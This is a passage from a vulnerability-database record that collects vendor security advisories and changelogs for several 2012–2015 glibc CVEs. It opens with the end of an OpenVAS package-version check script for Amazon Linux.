PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120169\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:19:06 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2015-495\");\n script_tag(name:\"insight\", value:\"An out-of-bounds read flaw was found in the way glibc's iconv() function converted certain encoded data to UTF-8. An attacker able to make an application call the iconv() function with a specially crafted argument could use this flaw to crash that application. (CVE-2014-6040 )It was found that the files back end of Name Service Switch (NSS) did not isolate iteration over an entire database from key-based look-up API calls. An application performing look-ups on a database while iterating over it could enter an infinite loop, leading to a denial of service. 
(CVE-2014-8121 )\");\n script_tag(name:\"solution\", value:\"Run yum update glibc to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-495.html\");\n script_cve_id(\"CVE-2014-6040\", \"CVE-2014-8121\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = 
isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "description": "Off-by-one in __gconv_translit_find().", "modified": "2014-09-01T00:00:00", "published": "2014-09-01T00:00:00", "id": "SECURITYVULNS:VULN:13947", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13947", "title": "GNU glibc buffer overflow", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:53", "bulletinFamily": "software", "description": "\r\n\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2328-1\r\nAugust 29, 2014\r\n\r\neglibc vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nCertain applications could be made to crash or run programs as an\r\nadministrator.\r\n\r\nSoftware Description:\r\n- eglibc: GNU C Library\r\n\r\nDetails:\r\n\r\nTavis Ormandy and John Haxby discovered that the GNU C Library contained an\r\noff-by-one error when performing transliteration module loading. A local\r\nattacker could exploit this to gain administrative privileges.\r\n(CVE-2014-5119)\r\n\r\nUSN-2306-1 fixed vulnerabilities in the GNU C Library. 
On Ubuntu 10.04 LTS\r\nand Ubuntu 12.04 LTS the security update for CVE-2014-0475 caused a\r\nregression with localplt on PowerPC. This update fixes the problem. We\r\napologize for the inconvenience.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 14.04 LTS:\r\n libc6 2.19-0ubuntu6.3\r\n\r\nUbuntu 12.04 LTS:\r\n libc6 2.15-0ubuntu10.7\r\n\r\nUbuntu 10.04 LTS:\r\n libc6 2.11.1-0ubuntu7.16\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2328-1\r\n CVE-2014-5119\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/eglibc/2.19-0ubuntu6.3\r\n https://launchpad.net/ubuntu/+source/eglibc/2.15-0ubuntu10.7\r\n https://launchpad.net/ubuntu/+source/eglibc/2.11.1-0ubuntu7.16\r\n\r\n\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "modified": "2014-09-01T00:00:00", "published": "2014-09-01T00:00:00", "id": "SECURITYVULNS:DOC:31067", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31067", "title": "[USN-2328-1] GNU C Library vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:45", "bulletinFamily": "software", "description": "CVE-2014-5119 glib_gconv_translit_find() exploit\n\n# \n\nImportant\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Ubuntu 14.04 LTS \n * Ubuntu 12.04 LTS \n * Ubuntu 10.04 LTS \n\n# Description\n\nCertain applications could be made to crash or run programs as an administrator.\n\nOff-by-one error in the __gconv_translit_find function in gconv_trans.c in GNU C Library (aka glibc) allows context-dependent attackers to 
cause a denial of service (crash) or execute arbitrary code via vectors related to the CHARSET environment variable and gconv transliteration modules.\n\n# Affected Products and Versions\n\n_Severity is important unless otherwise noted. \n_\n\n * Cloud Foundry Runtime Deployments prior to v183 with BOSH Ubuntu stemcells prior to 2710 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry Project recommends that Cloud Foundry Runtime Deployments running Release v182 or earlier upgrade to v183 or later and BOSH Ubuntu stemcell 2710 or later, which resolves this vulnerability. \n\n# Credit\n\nThis issue was discovered by Tavis Ormandy and John Haxby.\n\n# References\n\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5119>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119>\n * <http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html>\n\n# History\n\n2014-Sep-19: Initial vulnerability report published.\n", "modified": "2014-09-19T00:00:00", "published": "2014-09-19T00:00:00", "id": "CFOUNDRY:2CAD2503E6F8FEFB9D3E259027678487", "href": "https://www.cloudfoundry.org/blog/cve-2014-5119/", "title": "CVE-2014-5119 glib_gconv_translit_find() exploit | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2016-09-26T17:23:17", "bulletinFamily": "software", "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. 
If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, you should permit access to F5 products only over a secure network, and limit login access to trusted users. For additional information, refer to SOL13092 - Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n", "modified": "2015-07-23T00:00:00", "published": "2015-04-01T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/300/sol16342.html", "id": "SOL16342", "title": "SOL16342 - GNU C Library (glibc) vulnerability CVE-2012-6656", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:20", "bulletinFamily": "software", "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. 
The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, you should permit access to F5 products only over a secure network, and limit login access to trusted users. For additional information, refer to SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n * SOL12766: ARX hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n * SOL6664: Obtaining and installing OPSWAT hotfixes\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "modified": "2015-09-16T00:00:00", "published": "2015-04-14T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/400/sol16435.html", "id": "SOL16435", "title": "SOL16435 - GNU C Library vulnerability CVE-2014-6040", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:09:49", "bulletinFamily": "software", "description": "*Most ARX components are based on GNU C library code. \n\n\nRecommended action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. 
If the table does not list any version in the column, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2014-10-02T00:00:00", "published": "2014-10-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15640.html", "id": "SOL15640", "title": "SOL15640 - GNU C Library (glibc) vulnerabilities CVE-2014-0475, CVE-2014-5119, CVE-2013-4458", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-12T02:11:09", "bulletinFamily": "software", "description": " \n\n\n[CVE-2014-0475](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0475>)\n\nMultiple directory traversal vulnerabilities in GNU C Library (aka glibc or libc6) before 2.20 allow context-dependent attackers to bypass ForceCommand restrictions and possibly have other unspecified impact via a .. 
(dot dot) in a (1) LC_*, (2) LANG, or other locale environment variable.\n\n[CVE-2014-5119](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119>) \n\n\nOff-by-one error in the __gconv_translit_find function in gconv_trans.c in GNU C Library (aka glibc) allows context-dependent attackers to cause a denial of service (crash) or execute arbitrary code via vectors related to the CHARSET environment variable and gconv transliteration modules.\n\n[CVE-2013-4458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4458>)\n\nStack-based buffer overflow in the getaddrinfo function in sysdeps/posix/getaddrinfo.c in GNU C Library (aka glibc or libc6) 2.18 and earlier allows remote attackers to cause a denial of service (crash) via a (1) hostname or (2) IP address that triggers a large number of AF_INET6 address results. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-1914.\n\nImpact \n\n\nThis vulnerability may allow remote attackers to bypass restrictions and execute arbitrary code or cause a denial-of-service (DoS). \n\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. 
If the table does not list any version in the column, then no upgrade candidate currently exists.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:19:00", "published": "2014-10-02T23:35:00", "id": "F5:K15640", "href": "https://support.f5.com/csp/article/K15640", "title": "GNU C Library (glibc) vulnerabilities CVE-2014-0475, CVE-2014-5119, CVE-2013-4458", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2019-05-29T17:22:47", "bulletinFamily": "unix", "description": "Siddhesh Poyarekar discovered that the GNU C Library incorrectly handled certain multibyte characters when using the iconv function. An attacker could possibly use this issue to cause applications to crash, resulting in a denial of service. This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. (CVE-2012-6656)\n\nAdhemerval Zanella Netto discovered that the GNU C Library incorrectly handled certain multibyte characters when using the iconv function. An attacker could possibly use this issue to cause applications to crash, resulting in a denial of service. (CVE-2014-6040)\n\nTim Waugh discovered that the GNU C Library incorrectly enforced the WRDE_NOCMD flag when handling the wordexp function. An attacker could possibly use this issue to execute arbitrary commands. 
(CVE-2014-7817)", "modified": "2014-12-03T00:00:00", "published": "2014-12-03T00:00:00", "id": "USN-2432-1", "href": "https://usn.ubuntu.com/2432-1/", "title": "GNU C Library vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T17:22:18", "bulletinFamily": "unix", "description": "Tavis Ormandy and John Haxby discovered that the GNU C Library contained an off-by-one error when performing transliteration module loading. A local attacker could exploit this to gain administrative privileges. (CVE-2014-5119)\n\nUSN-2306-1 fixed vulnerabilities in the GNU C Library. On Ubuntu 10.04 LTS and Ubuntu 12.04 LTS the security update for CVE-2014-0475 caused a regression with localplt on PowerPC. This update fixes the problem. We apologize for the inconvenience.", "modified": "2014-08-29T00:00:00", "published": "2014-08-29T00:00:00", "id": "USN-2328-1", "href": "https://usn.ubuntu.com/2328-1/", "title": "GNU C Library vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:22:14", "bulletinFamily": "unix", "description": "Package : eglibc\nVersion : 2.11.3-4+deb6u2\nCVE ID : CVE-2012-6656 CVE-2014-6040 CVE-2014-7817\n\nCVE-2012-6656\n\n Fix validation check when converting from ibm930 to utf.\n When converting IBM930 code with iconv(), if IBM930 code which\n includes invalid multibyte character "0xffff" is specified, then\n iconv() segfaults.\n\nCVE-2014-6040\n\n Crashes on invalid input in IBM gconv modules [BZ #17325]\n These changes are based on the fix for BZ #14134 in commit\n 6e230d11837f3ae7b375ea69d7905f0d18eb79e5.\n\nCVE-2014-7817\n\n The function wordexp() fails to properly handle the WRDE_NOCMD\n flag when processing arithmetic inputs in the form of "$((... ``))"\n where "..." can be anything valid. 
The backticks in the arithmetic\n expression are evaluated in a shell even if WRDE_NOCMD forbade\n command substitution. This allows an attacker to attempt to pass\n dangerous commands via constructs of the above form, and bypass\n the WRDE_NOCMD flag. This patch fixes this by checking for WRDE_NOCMD\n in exec_comm(), the only place that can execute a shell. All other\n checks for WRDE_NOCMD are superfluous and removed.\n\n", "modified": "2014-11-29T19:00:34", "published": "2014-11-29T19:00:34", "id": "DEBIAN:DLA-97-1:B684D", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201411/msg00015.html", "title": "[SECURITY] [DLA 97-1] eglibc security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:21:41", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3142-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJanuary 27, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : eglibc\nCVE ID : CVE-2012-6656 CVE-2014-6040 CVE-2014-7817 CVE-2015-0235\n\nSeveral vulnerabilities have been fixed in eglibc, Debian's version of\nthe GNU C library:\n\nCVE-2015-0235\n\n Qualys discovered that the gethostbyname and gethostbyname2\n functions were subject to a buffer overflow if provided with a\n crafted IP address argument. 
This could be used by an attacker to\n execute arbitrary code in processes which called the affected\n functions.\n\n The original glibc bug was reported by Peter Klotz.\n\nCVE-2014-7817\n\n Tim Waugh of Red Hat discovered that the WRDE_NOCMD option of the\n wordexp function did not suppress command execution in all cases.\n This allows a context-dependent attacker to execute shell\n commands.\n\nCVE-2012-6656\nCVE-2014-6040\n\n The charset conversion code for certain IBM multi-byte code pages\n could perform an out-of-bounds array access, causing the process\n to crash. In some scenarios, this allows a remote attacker to\n cause a persistent denial of service.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 2.13-38+deb7u7.\n\nFor the upcoming stable distribution (jessie) and the unstable\ndistribution (sid), the CVE-2015-0235 issue has been fixed in version\n2.18-1 of the glibc package.\n\nWe recommend that you upgrade your eglibc packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2015-01-27T15:39:21", "published": "2015-01-27T15:39:21", "id": "DEBIAN:DSA-3142-1:A3964", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00025.html", "title": "[SECURITY] [DSA 3142-1] eglibc security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:03", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3012-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nAugust 27, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : 
eglibc\nCVE ID : CVE-2014-5119\n\nTavis Ormandy discovered a heap-based buffer overflow in the\ntransliteration module loading code in eglibc, Debian's version of the\nGNU C Library. As a result, an attacker who can supply a crafted\ndestination character set argument to iconv-related character\nconversation functions could achieve arbitrary code execution.\n\nThis update removes support of loadable gconv transliteration modules.\nBesides the security vulnerability, the module loading code had\nfunctionality defects which prevented it from working for the intended\npurpose.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.13-38+deb7u4.\n\nWe recommend that you upgrade your eglibc packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-08-27T05:51:39", "published": "2014-08-27T05:51:39", "id": "DEBIAN:DSA-3012-1:04A85", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00197.html", "title": "[SECURITY] [DSA 3012-1] eglibc security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-24T22:39:17", "bulletinFamily": "unix", "description": "Package : eglibc\nVersion : 2.11.3-4+deb6u1\nCVE ID : CVE-2014-0475 CVE-2014-5119\n\nCVE-2014-0475\n\n Stephane Chazelas discovered that the GNU C library, glibc, processed\n ".." path segments in locale-related environment variables, possibly\n allowing attackers to circumvent intended restrictions, such as\n ForceCommand in OpenSSH, assuming that they can supply crafted locale\n settings.\n\nCVE-2014-5119\n\n Tavis Ormandy discovered a heap-based buffer overflow in the\n transliteration module loading code in eglibc, Debian's version of the\n GNU C Library. 
As a result, an attacker who can supply a crafted\n destination character set argument to iconv-related character\n conversation functions could achieve arbitrary code execution.\n\n This update removes support of loadable gconv transliteration modules.\n Besides the security vulnerability, the module loading code had\n functionality defects which prevented it from working for the intended\n purpose.\n\n", "modified": "2014-09-02T18:16:47", "published": "2014-09-02T18:16:47", "id": "DEBIAN:DLA-43-1:D57FA", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201409/msg00000.html", "title": "[DLA 43-1] eglibc security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:17:43", "bulletinFamily": "unix", "description": "glibc was updated to fix three security issues:\n\n - A directory traversal in locale environment handling was fixed\n (CVE-2014-0475, bnc#887022, GLIBC BZ #17137)\n\n - Disable gconv transliteration module loading which could be used for\n code execution (CVE-2014-5119, bnc#892073, GLIBC BZ #17187)\n\n - Fix crashes on invalid input in IBM gconv modules (CVE-2014-6040,\n bnc#894553, BZ #17325)\n\n", "modified": "2014-09-11T09:04:39", "published": "2014-09-11T09:04:39", "id": "OPENSUSE-SU-2014:1115-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00009.html", "type": "suse", "title": "glibc (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:57:20", "bulletinFamily": "unix", "description": "This glibc update fixes a critical privilege escalation problem and the\n following security and non-security issues:\n\n * bnc#892073: An off-by-one error leading to a heap-based buffer\n overflow was found in __gconv_translit_find(). An exploit that\n targets the problem is publicly available. 
(CVE-2014-5119)\n * bnc#882600: Copy filename argument in\n posix_spawn_file_actions_addopen. (CVE-2014-4043)\n * bnc#860501: Use O_LARGEFILE for utmp file.\n * bnc#842291: Fix typo in glibc-2.5-dlopen-lookup-race.diff.\n * bnc#839870: Fix integer overflows in malloc. (CVE-2013-4332)\n * bnc#834594: Fix readdir_r with long file names. (CVE-2013-4237)\n * bnc#824639: Drop lock before calling malloc_printerr.\n * bnc#801246: Fix buffer overrun in regexp matcher. (CVE-2013-0242)\n * bnc#779320: Fix buffer overflow in strcoll. (CVE-2012-4412)\n * bnc#894556 / bnc#894553: Fix crashes on invalid input in IBM gconv\n modules. (CVE-2014-6040, CVE-2012-6656, bnc#894553, bnc#894556,\n BZ#17325, BZ#14134)\n\n Security Issues:\n\n * CVE-2014-5119\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119>\n * CVE-2014-4043\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4043>\n * CVE-2013-4332\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4332>\n * CVE-2013-4237\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4237>\n * CVE-2013-0242\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0242>\n * CVE-2012-4412\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4412>\n\n\n", "modified": "2014-09-15T19:04:18", "published": "2014-09-15T19:04:18", "id": "SUSE-SU-2014:1128-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00019.html", "title": "Security update 
for glibc (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:40:16", "bulletinFamily": "unix", "description": "This glibc update fixes a critical privilege escalation problem and two\n non-security issues:\n\n * bnc#892073: An off-by-one error leading to a heap-based buffer\n overflow was found in __gconv_translit_find(). An exploit that\n targets the problem is publicly available. (CVE-2014-5119)\n * bnc#892065: setenv-alloca.patch: Avoid unbound alloca in setenv.\n * bnc#888347: printf-multibyte-format.patch: Don't parse %s format\n argument as multi-byte string.\n\n Security Issues:\n\n * CVE-2014-5119\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119>\n\n", "modified": "2014-09-13T03:04:16", "published": "2014-09-13T03:04:16", "id": "SUSE-SU-2014:1125-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00017.html", "type": "suse", "title": "Security update for glibc (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:35", "bulletinFamily": "unix", "description": "[2.17-78.0.1]\n- Remove strstr and strcasestr implementations using sse4.2 instructions.\n- Upstream commits 584b18eb4df61ccd447db2dfe8c8a7901f8c8598 and\n 1818483b15d22016b0eae41d37ee91cc87b37510 backported.\n[2.17-78]\n- Fix ppc64le builds (#1077389).\n[2.17-77]\n- Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183545).\n[2.17-76]\n- Fix application crashes during calls to gettimeofday on ppc64\n when kernel exports gettimeofday via VDSO (#1077389).\n- Prevent NSS-based file backend from entering infinite loop\n when different APIs request the same service (CVE-2014-8121, #1182272).\n[2.17-75]\n- Fix permission of debuginfo source files to allow 
multiarch\n debuginfo packages to be installed and upgraded (#1170110).\n[2.17-74]\n- Fix wordexp() to honour WRDE_NOCMD (CVE-2014-7817, #1170487).\n[2.17-73]\n- ftell: seek to end only when there are unflushed bytes (#1156331).\n[2.17-72]\n- [s390] Fix up _dl_argv after adjusting arguments in _dl_start_user (#1161666).\n[2.17-71]\n- Fix incorrect handling of relocations in 64-bit LE mode for Power\n (#1162847).\n[2.17-70]\n- [s390] Retain stack alignment when skipping over loader argv (#1161666).\n[2.17-69]\n- Use __int128_t in link.h to support older compiler (#1120490).\n[2.17-68]\n- Revert to defining __extern_inline only for gcc-4.3+ (#1120490).\n[2.17-67]\n- Correct a defect in the generated math error table in the manual (#786638).\n[2.17-66]\n- Include preliminary thread, signal and cancellation safety documentation\n in manual (#786638).\n[2.17-65]\n- PowerPC 32-bit and 64-bit optimized function support using STT_GNU_IFUNC\n (#731837).\n- Support running Intel MPX-enabled applications (#1132518).\n- Support running Intel AVX-512-enabled applications (#1140272).\n[2.17-64]\n- Fix crashes on invalid input in IBM gconv modules (#1140474, CVE-2014-6040).\n[2.17-63]\n- Build build-locale-archive statically (#1070611).\n- Return failure in getnetgrent only when all netgroups have been searched\n (#1085313).\n[2.17-62]\n- Don't use alloca in addgetnetgrentX (#1138520).\n- Adjust pointers to triplets in netgroup query data (#1138520).\n[2.17-61]\n- Set CS_PATH to just /use/bin (#1124453).\n- Add systemtap probe in lll_futex_wake for ppc and s390 (#1084089).\n[2.17-60]\n- Add mmap usage to malloc_info output (#1103856).\n- Fix nscd lookup for innetgr when netgroup has wildcards (#1080766).\n- Fix memory order when reading libgcc handle (#1103874).\n- Fix typo in nscd/selinux.c (#1125306).\n- Do not fail if one of the two responses to AF_UNSPEC fails (#1098047).\n[2.17-59]\n- Provide correct buffer length to netgroup queries in nscd (#1083647).\n- Return NULL for 
